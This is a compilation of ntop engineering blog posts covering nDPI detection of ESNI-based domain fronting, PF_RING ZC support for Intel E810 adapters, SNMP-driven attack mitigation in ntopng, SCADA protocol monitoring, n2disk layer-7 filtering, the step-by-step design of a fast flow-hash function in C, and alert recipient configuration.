Recently, at DEF CON 28, a new tool named Noctilucent was demonstrated. This tool revamped the domain fronting technique by exploiting TLS 1.3 ESNI (Encrypted SNI) to bypass censorship. It uses the ESNI (which is encrypted, contrary to the SNI, which is in clear text) to specify a domain name different from the SNI. Example: the SNI contains allowed.example, while the ESNI (and the HTTP Host header) contains forbidden.example. In essence the ESNI obfuscates the real domain of an HTTPS connection and thus can be used to circumvent security policies.

As the use of ESNI is not yet standard and still experimental, and as nDPI already supports the concept of a security risk used to report potentially dangerous activities (e.g. a suspicious DGA domain or a malformed HTTP header), it has recently been enhanced with a new security risk (NDPI_TLS_SUSPICIOUS_ESNI_USAGE) raised whenever a TLS 1.3 flow uses ESNI, as this can potentially hide information or attacks. Thanks to this security risk mechanism, all applications using nDPI (e.g. ntopng) can immediately detect this problem by simply recompiling against the latest nDPI library, without any code change. Of course, if your application is used in inline mode, it can also block TLS 1.3 connections using ESNI.

Enjoy!

Introducing PF_RING ZC support for Intel E810-based 100G adapters


Last year Intel announced a new family of 100 Gigabit network adapters, code-named Columbiaville. These new adapters, based on the new Intel Ethernet Controller E810, support 10/25/50/100 Gbps link speeds and provide programmable offload capabilities.

Programmability

800 Series adapters implement new features to improve connectivity, storage protocols and programmability, thanks also to the Dynamic Device Personalization (DDP) technology, which adds support for a programmable pipeline. In fact, with DDP, a parser embedded in the controller can help software parse custom protocols and manipulate outgoing packets, paving the way to new offload capabilities in addition to those usually available in commodity adapters (e.g. Large Receive Offload, L3/L4 checksum computation, VLAN stripping, etc.). The ability, for instance, to classify custom protocols in hardware and distribute packets to specific queues based on custom packet types improves application performance in many use cases. It is possible, for instance, to extend Receive Side Scaling (RSS) and Flow Director (FDIR) capabilities to inspect encapsulated packet headers, as in the case of GTP traffic. This was first introduced in 700 Series controllers, but with the 800 Series it is possible to load custom DDP profiles at boot time or at run-time.

Performance

The ice-zc driver, introduced a few weeks ago as part of the PF_RING ZC framework, provides zero-copy support for 800 Series adapters. Based on initial tests at 100 Gigabit on an Intel Xeon E-2136 CPU @ 3.30GHz, this controller proved capable of capturing traffic at 25 Mpps per queue (it scales almost linearly when enabling RSS) and transmitting almost 90 Mpps using a single core. On an adequate CPU with enough cores, this should let us process 100 Gigabit traffic with multi-process/multi-threaded applications that can leverage RSS to distribute the load across multiple cores, like nProbe Cento. In the above scenario, nProbe Cento with 6 RSS queues processed 78 Mpps (10k flows, 52 Gbit with 64-byte packets, or 100 Gbit line rate with larger packets) with no drops, making it suitable for low-cost packet processing on commodity hardware.

Test Run

The ice-zc driver is already available in the nightly build repository, and it can be installed following the instructions provided in the User's Guide, which are the same for all the ZC drivers. The Intel E810 requires a programmable-pipeline DDP package to be loaded by the driver during initialisation to support normal operations. The default DDP package file name is ice.pkg; this is provided with the ice-zc driver and should be placed under /lib/firmware/updates/intel/ice/ddp or /lib/firmware/intel/ice/ddp in order to be found by the driver. Once that is done, your adapter is detected by PF_RING and you can use it with tools such as pfcount or zsend.
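For a quick sanity check, you can count the packets received through the ZC driver on the first E810 port (the interface name below is an assumption; use the name your system assigns):

pfcount -i zc:eth1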

Please note that the E810 chipset is currently in pre-release; to get early access to Ethernet adapters for testing, please contact Silicom.

How Attack Mitigation Works (via SNMP)


One of the greatest strengths of ntopng is its ability to correlate data originating at different layers and at multiple sources together. For example, ntopng can look at IP packets, Ethernet frames and, at the same time, poll SNMP devices. This enables ntopng to effectively perform correlations and observe:

  • The behavior of IP addresses (e.g., Is this IP known to be blacklisted?)
  • The MAC addresses carrying IP traffic around in the network
  • The physical location of the MAC addresses (i.e., physical switches traversed by a given MAC address along with trunk and access ports)

ntopng, starting from version 4.1, capitalizes on this information to implement attack mitigation via SNMP. In other words, ntopng:

  1. Uses an indication of compromise known as score to determine whether an IP is an attacker (client score) or a victim (server score).
  2. Finds physical switches and access ports where attackers are connected to.
  3. Uses SNMP to turn access ports down, thus effectively disconnecting the attackers from the healthy network.
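In practice, step 3 corresponds to a standard SNMP write on the switch. As an illustration (community string, switch address and ifIndex are placeholders), turning an access port down means setting IF-MIB::ifAdminStatus (OID 1.3.6.1.2.1.2.2.1.7, where 1 = up and 2 = down) for the ifIndex of the port, e.g. with the net-snmp command-line tools:

snmpset -v2c -c private 192.168.2.168 1.3.6.1.2.1.2.2.1.7.15 i 2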

Attack mitigation via SNMP is implemented as an ntopng plugin, available in versions Enterprise M and above, and can be enabled from the user scripts configuration page.

Let's see what happens in practice. For this example, an attacker host 192.168.2.149 is configured to run a port scan (nmap -sS) towards 192.168.2.222. ntopng, using traffic and SNMP data, is able to identify host 192.168.2.149 as a PcEngines device connected to interface gigabitethernet15 of switch 192.168.2.168.

The port scan is immediately detected by ntopng

 

Indeed, there are many alerted “TCP Connection Refused” flows having 192.168.2.149 as source – apu is the DNS name of 192.168.2.149. Due to this suspicious activity, there is a significant increase in the score of 192.168.2.149

This score is high enough to make attack mitigation via SNMP kick in. Within a minute of the increase in the host score, mitigation causes the port on the SNMP device to be turned down.

From this point on, attacker host 192.168.2.149 is effectively disconnected from the network and, thus, it becomes harmless. It is up to the network administrator now to intervene and do any necessary cleanup operation on the attacker host. Once the issues have been resolved, the SNMP port can be turned up again from the preferences.

 

Having attack mitigation via SNMP implemented in ntopng is just a preliminary step towards making ntopng not just a monitoring and visualisation tool but also something which proactively prevents attackers from harming the network.

What's next is the ability to protect a network by mitigating external attackers. nScrub is a good example of a tool that can mitigate DDoS attacks. Stay tuned for news!


Monitoring Industrial IoT/Scada Traffic with nDPI and ntopng


Monitoring Industrial IoT and SCADA traffic can be challenging, as most open source monitoring tools are designed for Internet protocols. As this is becoming a hot topic, with companies automating production lines, we have decided to enhance the ntop tools to provide our user community with traffic visibility even in industrial environments. This required enhancing nDPI to detect these protocols, and enhancing ntopng, our monitoring console, to visualize this traffic by providing enhanced protocol dissection on top of which alerts can be triggered.

To date, nDPI supports the Modbus, DNP3 and IEC 60870 protocols. IEC 60870 in particular is very important, as it can be used to detect issues such as:

  • Unknown telemetry addresses
  • Connection loss and restore
  • Loss of data coming from remote systems

The standard is quite complex, and if you want to monitor this traffic and trigger alerts using open source software, your choice is limited to custom scripts for the Suricata IDS or Zeek/Malcolm. As ntopng has the ability to trigger alerts by means of user scripts when specific events happen, we have decided to enhance ntopng to dissect this traffic, so that it is possible to emit custom alerts when specific communications are detected. In SCADA environments, in fact, companies usually monitor traffic passively instead of actively dropping specific communications when something goes wrong: the risk of dropping a wrong packet is too high compared to the benefit, and it is much better to trigger an alert and handle it than to take that risk.

ntopng has been extended to continuously monitor IEC 60870 communications (i.e. not just the first few packets of a communication) and dissect individual PDUs. This way users can trigger alerts by means of ntopng user scripts. The flexibility introduced in ntopng 4.1.x, where scripts can be bound to host pools, allows custom script configurations to be created for specific devices, so that each device family has (potentially) its own custom ruleset.

The above picture shows how an IEC 60870 flow is detected and reported by ntopng, which complements the usual metrics (latency, throughput, retransmissions…) with protocol-specific information that can be used to detect anomalies and trigger alerts.

Happy IoT and Scada monitoring!

September Webinars: ntopng Scripting and API Integrations


Save the date! Two webinars have been planned for the cycle of this month.

We start on Thursday, September 17th, 16:00 CEST / 10 AM EST, with “How to Write an ntopng Plugin“. In this workshop, we will see how to create an ntopng Lua plugin to generate alerts and opportunely update the ‘score’ indicator of compromise for hosts and flows. During the workshop, we will walk the audience through a typical workflow which can then be reused to write any kind of plugin. We will start with a simple “Hello World” plugin, and then we will extend its features, step-by-step, to generate alerts and update hosts and flows, depending on the nDPI “Risk Factor”. Intended audience is practitioners with minimal scripting skills. By the end of the workshop, participants will have sufficient skills and understanding necessary to extend ntopng with custom plugins.

Workshop agenda will be the following:

  • Introduction
    • ntopng extensibility
  • Basic concepts
    • Plugin functionalities
  • Goal definition
  • Hands on
    • Creating a "Hello World" plugin
    • Extending the plugin for the generation of alerts
  • Discussion
  • Wrap-Up and conclusions

Workshop will be held online on Microsoft Teams at this link.

Then, on Thursday, September 24th, 16:00 CEST / 10 AM EST, our friend Ronald Henderson will present “ntopng Data Acquisition API with Network Security Toolkit (NST)“. He will discuss NST production examples using the ntopng data acquisition API, including Geolocation Mercator Map, Google Earth KML Map and Google 3D Globe Multi-Series Maps. He will also demonstrate how ntopng has been integrated with NST, and show NST ntopng real-time Host and Flow Geolocation.

Presentation agenda will be the following:

  • Introduction information
  • Agenda Summary
  • Example NST production examples using the ntopng data acquisition API
    • Geolocation Mercator Map
    • Google Earth KML Map
    • Google 3D Globe Multi-Series Maps
  • Command line (CLI)
    • ntopng API Host Stats usage
    • ntopng API Flow Stats usage
  • Ntopng NST integration
  • NST WUI Ntopng usage
  • NST Ntopng real-time Host and Flow Geolocation demo
  • Ntopng nDPI ndpiReader demo
  • Q & A

The presentation will be held online on Microsoft Teams at this link.

 

How to Dump, Index, and Layer-7 Filter Network Traffic at High Speed


n2disk is an application that many in the ntop community use to dump traffic at up to 100 Gbit. What few people know is that n2disk can index data not just using packet header information (i.e. IP, port, VLAN, MAC…) but also using nDPI, to produce an index that contains application protocol information.

This filtering can happen:

  • During packet capture (i.e. instruct n2disk to avoid dumping specific protocols such as Netflix or YouTube that take up a lot of disk space and that are usually harmless).
  • While extracting packets from stored pcap files.
  • With any PF_RING-based application, including those using libpcap such as tcpdump or Suricata.

L7 Capture Filters

Thanks to the integration with PF_RING FT (no additional PF_RING FT license is necessary with n2disk 10/40/100 Gbit), n2disk supports --l7-filter-conf <file> to specify a configuration file defining which protocols should be forwarded to the n2disk engine and which ones should be discarded, and hence not dumped to pcaps. For example, to drop streaming traffic and dump the rest, you can specify a filter file named ft.conf like the one below:

[global]
default = forward

[filter]
YouTube = discard
Netflix = discard

 

L7 Extraction Filters

During pcap extraction, it is possible to extract selected packets from pcaps using L7 filtering, but only if an extended index (add -I -E 2 to n2disk) has been created during packet capture. This way the n2disk companion utility named npcapextract can filter packets using the L7 protocol in addition to the usual packet header-based filters. For instance, to extract all Instagram traffic from host 192.168.1.1:

npcapextract -t /storage -b "2020-09-16 12:05:32" -e "2020-09-16 12:10:32" -o output.pcap -f "ip host 192.168.1.1 and l7proto Instagram"

This technique supports all the protocols detected by nDPI, a list that is continuously updated as new protocols/versions are supported.

 

Using L7 Filtering with PF_RING-based tools (including tcpdump)

In addition to n2disk, PF_RING supports L7 filtering natively. You simply have to compile your application on top of PF_RING or of libpcap-PF_RING. For instance, if you use tcpdump compiled on top of PF_RING (which you can find here), you can do

# PF_RING_FT_CONF=ft.conf tcpdump -ni pcap:file.pcap

or

# PF_RING_FT_CONF=ft.conf tcpdump -i eth0

Note that with live traffic nDPI needs a few packets to detect the application protocol; hence, for TCP-based protocols, the initial three-way handshake is not filtered, whereas the following packets are filtered according to the L7 rules.

If you want to know more about this technique you can read more in the n2disk user’s guide.

Summary

Thanks to nDPI, via PF_RING, you can now complement existing packet header-based filtering techniques such as BPF with layer-7 filtering during packet capture, indexing and extraction. This allows you to save disk space by not dumping unwanted protocols, and to extract only the traffic you care about, which can be complicated to do given the plethora of application protocols present in modern network traffic.

How Great Hashing Can (More Than) Double Application Performance


Most ntop applications (ntopng, nProbe, Cento) and libraries (FT) are based on the concept of flow processing, which merely means keeping track of all network communications. In order to implement this, network packets are decoded and, based on a "key" (usually a 5-tuple consisting of protocol and src/dst IP and port), clustered into flows (other keys, such as the VLAN, can be added if necessary). This usually requires a lookup in a hash table, using a hash function to translate the key into an index for an array with collision lists.
A good hash function should be collision resistant (it should be hard to find two input keys that hash to the same index), to avoid huge collision lists, which hurt lookup performance. However, building a strong hash often translates into poor performance; in fact, most of the well-known, publicly available hash functions are computationally expensive.

A few days ago, we were struggling to optimise one of our applications, to make it process traffic at 100 Gbps. This application had to perform flow classification and a bunch of other activities within the same thread. During this analysis we ended up trying to accelerate hash lookups, and we were faced with the hash function itself, which was taking most of the CPU. The application was using the Fowler-Noll-Vo (FNV) hash function, which is one of the fastest available in the literature, with a fairly good distribution. This led to a discussion with our friend Logan oos Even, who is helping us a lot with applied cryptography in n2n and has demonstrated strong experience in the field. At the end of the discussion, he offered to help build a fast hash function from scratch for our application.

The requirements for the hash were clear:

  1. 12 byte input (this is what we need for a bidirectional flow key)
  2. 32 bit output (enough to index any hash table size)
  3. well distributed, for use with a hash table
  4. **fast**, the hash function itself has to be able to compute at least 600M hashes per second (we got this number with some math from the required performance and the CPU cycles available) on a 3 GHz E3 CPU
  5. optionally consider SSE 4.2 or AVX 2 which are supported by most CPUs today

This sounded easy to Logan, and he started considering using the round functions of some ARX ciphers, or otherwise taking advantage of hardware-accelerated AES-NI (which should be available on CPUs supporting AVX2).

Having only a laptop computer (Intel i7 2860QM) available, Logan found that his favorite Pearson hashing was too slow to meet the requirements. Taking a quick look at FNV, which is what we had initially selected for the application, Logan found that it walks byte-by-byte through the input, just like Pearson hashing. Thus the first idea was: what if we take the input in chunks of 32 or 64 bits instead? No problem, as we had a well-structured 12-byte input, which makes three same-sized 32-bit input pieces.

As a second idea, Logan thought of the xorshift pseudo-random number generator, whose round function offers a somewhat scrambling bijection. Unfortunately, in this approach zero gets mapped to zero – something he wanted to avoid for the beauty of the output. Also, input states with only a few bits set are transformed into outputs with only a few (more) bits set. To counter this, he decremented the input (zero becomes "all set", and at least all trailing zero-bits turn to '1'), accumulated the result, and added the other input words between the scrambling rounds. The addition operation interrupts the sequence of otherwise linear shifts and exclusive-ors, and thus keeps xor-shift patterns out of the distribution to a certain degree.

So, the first draft was ready to be tested:

#include <stdint.h>

// 'in' points to some 12 byte memory data to be hashed
// uses round function of xorshift32 prng
uint32_t simple_hash (uint8_t *in) {
  uint32_t ret = 0;

  ret += *(uint32_t*)(in+0);
  ret--;

  ret ^= ret << 13; // 1st round function of xorshift32
  ret ^= ret >> 17;
  ret ^= ret << 5;

  ret += *(uint32_t*)(in+4);
  ret--;

  ret ^= ret << 13; // 2nd round function of xorshift32
  ret ^= ret >> 17;
  ret ^= ret << 5;

  ret ^= ret << 13; // another round for more scrambling
  ret ^= ret >> 17;
  ret ^= ret << 5;

  ret += *(uint32_t*)(in+8);

  return ret;
}

First of all we had to check the distribution, which we did with empirical statistics: counting how often different groups of outputs appeared for certain input patterns, e.g. how many of the inputs ending in ten `0x00` bytes (varying the first two bytes only) led to an output with a leading `F` nibble. It should be around 4096. This was repeated for a lot of combinations, positions and lengths to gather enough evidence of a roughly uniform distribution. However, it was also important to eyeball long listings of outputs for subsequent input data: one could find "regions" of repeating patterns or always-zero digits for certain input ranges. The latter was the reason for placing an additional scrambling round.
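
As an illustration, one such counting experiment could look like the minimal sketch below (our own sketch, not Logan's actual test harness): vary the first two input bytes, keep the remaining ten bytes at 0x00, and count how many outputs carry a leading F nibble.

#include <stdint.h>
#include <stdio.h>
#include <string.h>

uint32_t simple_hash(uint8_t *in); // one of the versions shown in this post

int main(void) {
  uint8_t in[12];
  uint32_t count = 0;

  memset(in, 0, sizeof(in)); // the ten trailing 0x00 bytes stay fixed
  for (uint32_t v = 0; v < 65536; v++) {
    in[0] = (uint8_t)(v & 0xFF); // vary the first two bytes only
    in[1] = (uint8_t)(v >> 8);
    if ((simple_hash(in) >> 28) == 0xF) // is the leading nibble F?
      count++;
  }

  // 65536 inputs spread over 16 equally likely nibble values: ~4096 expected
  printf("leading-F outputs: %u (expected ~4096)\n", count);
  return 0;
}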

Talking about distribution, Logan cared about the bijectivity of all building blocks because he did not want to miss a thing on either side, neither domain nor co-domain: any two inputs mapped to the same value would negatively impact the output distribution.

On Logan's laptop, at a clock speed of 3.6 GHz but with an old Intel architecture, this turned out to deliver slightly above 105 Mhps (million hashes per second) when compiled with `-O3` compiler optimizations, 40 Mhps without. Then we tried a Xeon machine, closer to a production machine: a Xeon E3-1230 v5 at 3.4 GHz. On this system the function computed 260 Mhps!
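
Mhps figures of this kind can be estimated with a simple timing loop such as the sketch below (our assumption of a measurement method, not the exact harness we used); compile with `-O3`:

#include <stdint.h>
#include <stdio.h>
#include <time.h>

uint32_t simple_hash(uint8_t *in); // version under test

int main(void) {
  uint8_t in[12] = { 0 };
  volatile uint32_t sink = 0;      // prevents the loop from being optimized away
  const uint64_t n = 100000000ULL; // 100M hash computations
  struct timespec t0, t1;

  clock_gettime(CLOCK_MONOTONIC, &t0);
  for (uint64_t i = 0; i < n; i++) {
    *(uint32_t*)in = (uint32_t)i;  // vary the input on every iteration
    sink ^= simple_hash(in);
  }
  clock_gettime(CLOCK_MONOTONIC, &t1);

  double secs = (t1.tv_sec - t0.tv_sec) + (t1.tv_nsec - t0.tv_nsec) / 1e9;
  printf("%.1f Mhps (sink=%u)\n", (double)n / secs / 1e6, sink);
  return 0;
}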

As a first revision, Logan decided to replace the "2nd round function" of xorshift32 with another bijection that also relies on simple primitives such as rotation and bitwise operations: an xor-rotate, assuming that the compiler would translate the ROR macro (see the code below) into the assembly rotate instruction, accelerating the computation:

  #define ROR32(x,r) (((x)>>(r))|((x)<<(32-(r))))
  …
  ret ^= ROR32(ret, 17) ^ ROR32(ret, 13);

And yes, this delivered 304 Mhps!

By the way, replacing the “2nd round function” and not “another round function” was a decision based on output observation.
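
For clarity, this is how the revised draft presumably looked with the xor-rotate in place (our reconstruction based on the description above, not the verbatim code):

#define ROR32(x,r) (((x)>>(r))|((x)<<(32-(r))))

// 'in' points to some 12 byte memory data to be hashed
uint32_t simple_hash (uint8_t *in) {
  uint32_t ret = 0;

  ret += *(uint32_t*)(in+0);
  ret--;

  ret ^= ret << 13; // 1st round function of xorshift32
  ret ^= ret >> 17;
  ret ^= ret << 5;

  ret += *(uint32_t*)(in+4);
  ret--;

  ret ^= ROR32(ret, 17) ^ ROR32(ret, 13); // xor-rotate replaces the 2nd round

  ret ^= ret << 13; // another round for more scrambling
  ret ^= ret >> 17;
  ret ^= ret << 5;

  ret += *(uint32_t*)(in+8);

  return ret;
}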

Now, how to double performance to reach 600 Mhps as per the requirement? By getting rid of instructions! Hence, Logan reduced everything to a single shift-xor round, interleaved the additions of the three input words between its steps, and used a final scramble to make the output look good:

#define ROR32(x,r) (((x)>>(r))|((x)<<(32-(r))))

// 'in' points to some 12 byte memory data to be hashed;
// interleaves additions of data into one round function of xorshift32 prng
// and performs a bijective final xor-rotate
uint32_t simple_hash (uint8_t *in) {
  uint32_t ret = *(uint32_t*)in;
  ret--;

  ret ^= ret << 13; // 1st step of round function of xorshift32

  ret += *(uint32_t*)(in+4);
  ret--;

  ret ^= ret >> 17; // 2nd step of round function of xorshift32

  ret += *(uint32_t*)(in+8);

  ret ^= ret <<  5; // 3rd step of round function of xorshift32

  ret ^= ROR32(ret, 17) ^ ROR32(ret, 11); // final scramble xor-rotate

  return ret;
}

This did not fully double performance on Logan's i7 2860QM, but it did on his second computer, powered by an Intel i7 7500U. Expecting the same benefit from the more modern CPU architecture, we tried the Xeon, pretty sure that it would also show the doubling: 365 Mhps. That was definitely strange! We were not there yet.

Trying SSE to load all 16 bytes at once (adding some padding to the input data) was a disaster. Even the simplest SSE instruction applied to the data was way slower than any of the scalar versions above. Same result for one or two rounds of hardware-accelerated AES applied to the data in an SSE register. It seemed that performance was eaten up by the load and store operations: reading longer data from memory resulted in extra cost. That was in line with Logan's former experience and the reason why he preferred to stick to 32 bits: 64-bit operations were much slower on the 2860QM even though it is considered a 64-bit CPU.
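
The AES-NI attempts looked roughly like the sketch below (our assumption of the approach, not Logan's actual code): load the padded 16-byte key into an SSE register, apply one hardware AES round as a scrambler, extract 32 bits. Compile e.g. with `-maes -msse4.2`.

#include <stdint.h>
#include <wmmintrin.h> // AES-NI intrinsics
#include <smmintrin.h> // SSE4, _mm_extract_epi32

// 'in_16_bytes_long' points to the 12-byte key padded to 16 bytes
uint32_t aes_hash (const uint8_t *in_16_bytes_long) {
  __m128i v   = _mm_loadu_si128((const __m128i *)in_16_bytes_long);
  __m128i key = _mm_set_epi32(0x01234567, 0x1a2b3c4d,
                              0x2468ace0, 0x13579bdf); // arbitrary round key

  v = _mm_aesenc_si128(v, key); // one hardware AES round
  return (uint32_t)_mm_extract_epi32(v, 0);
}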

At this point Logan even tried an idea that he had originally ruled out: linear congruential generators. He feared the cost of the multiplication and of reading the constant factor from memory. Sticking with 32 bits and choosing some arbitrary, probably not optimally chosen constants, he was surprised to see that this doubled the speed on the i7 2860QM.

#define ROR32(x,r) (((x)>>(r))|((x)<<(32-(r))))

// 'in' points to some 12 byte memory data to be hashed;
// applies different linear congruential generators
// and performs a bijective final xor-rotate
uint32_t simple_hash (uint8_t *in) {
  uint32_t a, b, c;

  a = *(uint32_t*)(in + 0);
  b = *(uint32_t*)(in + 4);
  c = *(uint32_t*)(in + 8);

  a = a * 0x53731741 + 0x61949103;
  b = b * 0x7038151b + 0x29875275;
  c = c * 0xc2758245 + 0x28759251;

  a = (a + b + c);

  // final scramble
  a ^= ROR32(a, 17) ^ ROR32(a, 11);

  return a;
}

416 Mhps.

Seemingly, a step in the right direction. Based on our experience with Xeon CPUs, we suggested that Logan try 64-bit arithmetic to save one multiplication. Logan, with his i7 experience in mind, was reluctant but gave it a shot, merging `a` and `b` into one 64-bit generator and keeping `c` at the presumably faster 32 bits. Indeed, this version turned out slower on the i7. But, surprisingly, it delivered 530 Mhps on the Xeon! So, Logan decided to make it two 64-bit generators. Linear congruential generators are bijective if their parameters are chosen wisely.
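
That intermediate version presumably looked like this sketch (our reconstruction under the assumptions above; the constants are placeholders taken from the surrounding code, not necessarily the ones actually used):

#define ROR32(x,r) (((x)>>(r))|((x)<<(32-(r))))

// 'in' points to some 12 byte memory data to be hashed;
// one 64-bit and one 32-bit linear congruential generator
uint32_t simple_hash (uint8_t *in) {
  uint64_t ab = *(uint64_t*)(in + 0); // 'a' and 'b' merged into 64 bits
  uint32_t c  = *(uint32_t*)(in + 8); // 'c' kept at 32 bits

  ab = ab * 0x2c6fe96ee78b6955ULL + 0x9af64480a3486659ULL; // 64-bit LCG
  c  = c  * 0xc2758245 + 0x28759251;                       // 32-bit LCG

  uint32_t ret = (uint32_t)(ab ^ (ab >> 32)) + c; // mix, fold to 32 bits

  ret ^= ROR32(ret, 17) ^ ROR32(ret, 11); // final scramble
  return ret;
}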

Linear congruential generators share the property that any suffix of a certain length repeats sequentially, e.g. the last nibble of a sequential output always repeats after 16 steps. This would probably also hold true for the sum of two generator outputs. For that reason, a final scramble of a different kind was required; here the xor-rotate came in handy again. This code has been added to the nDPI toolkit so that every application using it can take advantage of it without duplicating code.

#define ROR64(x,r) (((x)>>(r))|((x)<<(64-(r))))

/*
  'in_16_bytes_long' points to some 16 byte memory data to be hashed;
  two independent 64-bit linear congruential generators are applied,
  results are mixed, scrambled and cast to 32-bit
*/
u_int32_t ndpi_quick_16_byte_hash(u_int8_t *in_16_bytes_long) {
  u_int64_t a = *(u_int64_t*)(in_16_bytes_long + 0);
  u_int64_t c = *(u_int64_t*)(in_16_bytes_long + 8);

  // multipliers are taken from sprng.org, addends are prime
  a = a * 0x2c6fe96ee78b6955 + 0x9af64480a3486659;
  c = c * 0x369dea0f31a53f85 + 0xd0c6225445b76b5b;

  // mix results
  a += c;

  // final scramble
  a ^= ROR64(a, 13) ^ ROR64(a, 7);

  // down-casting, also taking advantage of the upper half
  a ^= a >> 32;

  return((u_int32_t)a);
}

598 Mhps! We made it!
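
As a usage sketch, a caller with a 12-byte bidirectional flow key can pad it to 16 bytes and mask the result to index a power-of-two hash table (the struct layout and names below are our own illustration, not from nDPI):

#include <stdint.h>
#include <string.h>
#include "ndpi_api.h" // nDPI toolkit header, assumed to declare ndpi_quick_16_byte_hash()

#define TABLE_SIZE 1048576 // must be a power of two for the mask below

struct flow_key {
  uint32_t src_ip, dst_ip;     // IPv4 addresses
  uint16_t src_port, dst_port; // L4 ports
};                             // 12 bytes in total

uint32_t flow_bucket(const struct flow_key *k) {
  uint8_t buf[16] = { 0 }; // zero padding for the last 4 bytes
  memcpy(buf, k, 12);      // the 12-byte key described above
  return ndpi_quick_16_byte_hash(buf) & (TABLE_SIZE - 1);
}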

At the end of this journey, we learned a lot. Especially the proverbial "your mileage may vary" proved true along the way. We are pretty sure there are even faster ways to go: if you feel like sending your code to us, we will get back to you with a score (Mhps). :-)

Special thanks to Logan oos Even who helped ntop once again with passion and dedication.

Using ntopng Recipients and Endpoints for Flexible Alert Handling

In the latest ntopng 4.1.x versions (and soon 4.2) we have completely reworked the way alerts are delivered to subscribers. Up to 4.0 the ntopng engine was configured in a single way for all alerts: go to the preferences page and specify where to deliver them. This was suboptimal for many reasons, including the fact that it was not possible to send alerts to different recipients over different channels, or to selectively decide when to send alerts out.

For this reason we have introduced the concept of

  • Endpoints
    The configuration of a server account to which alerts are sent. It lets you configure the server parameters once (for email, for instance, the server IP, username and password) and reuse them multiple times.
  • Recipients
    Endpoint users to which alerts are delivered. For instance, once you have configured an email server endpoint, you can define several recipients reachable over that same endpoint: each one simply inherits the endpoint configuration and adds just the recipient email address.

For the impatient, we have prepared a video that shows all the steps to follow in detail

otherwise you can follow this short tutorial below.

How to Configure Recipients and Endpoints

This is done by selecting the System interface, using the Notification submenu.

Endpoints have to be defined first, as follows.

Note that there are several endpoint families, including:

  • Email
  • ElasticSearch
  • Slack
  • WebHook
  • Discord
  • Syslog

At this point you can define a recipient, i.e. the person who will receive the alert messages.

Note that you can specify which alert severities and categories should be delivered to each recipient. This way you can, for instance, deliver security events to one recipient and network events to another.

Of course you can define multiple recipients and endpoints.

Binding Recipients to Alerts

Now that we have defined where alerts should be delivered, we need to specify how and when alerts are delivered to the specified recipients. This is implemented through Pools, which you can access under the System menu.

Pools are a way to cluster resources to which we want to apply a specific setup. As you can see from the picture below, there are various pool families:

  • Hosts
  • Interfaces
  • Local networks
  • SNMP Devices
  • Active Monitoring
  • Host Pools (pools of host pools)
  • Flows
  • Devices
  • System (Interface)

Suppose you want to send an alert when active monitoring has something to report. All you need to do is:

  • Select the Active Monitoring tab
  • Click on the Edit button, select from the dropdown menu the recipient we have just defined, and save

If you want to double-check that this setup is correct, you can go to an active monitoring resource you defined and edit it.

As you can see in the highlighted text above, the recipient we just created is now in use.

What if you now want to define different recipients for each monitored host? You need to go back to the pools page, select Active Monitoring (the same applies to the other tabs), define new pools as shown below, and associate different recipients with them.

Then you can go back to the active monitoring page and select, for each host, the pool you want, as shown below.

To make things a bit more complicated, you need to master how host pools are defined. Contrary to active monitoring, host pools can be quite complex, as you might want to define pool members based on IP addresses, networks (CIDR) and MAC addresses (great for DHCP networks where IPs are floating).

Final Words

We hope that the concepts of recipients and endpoints are now clear. You now have the flexibility to deliver events to selected recipients in a simple yet effective way. All these features are part of ntopng 4.1.x and will soon be part of the next 4.2 stable release.

Enjoy!
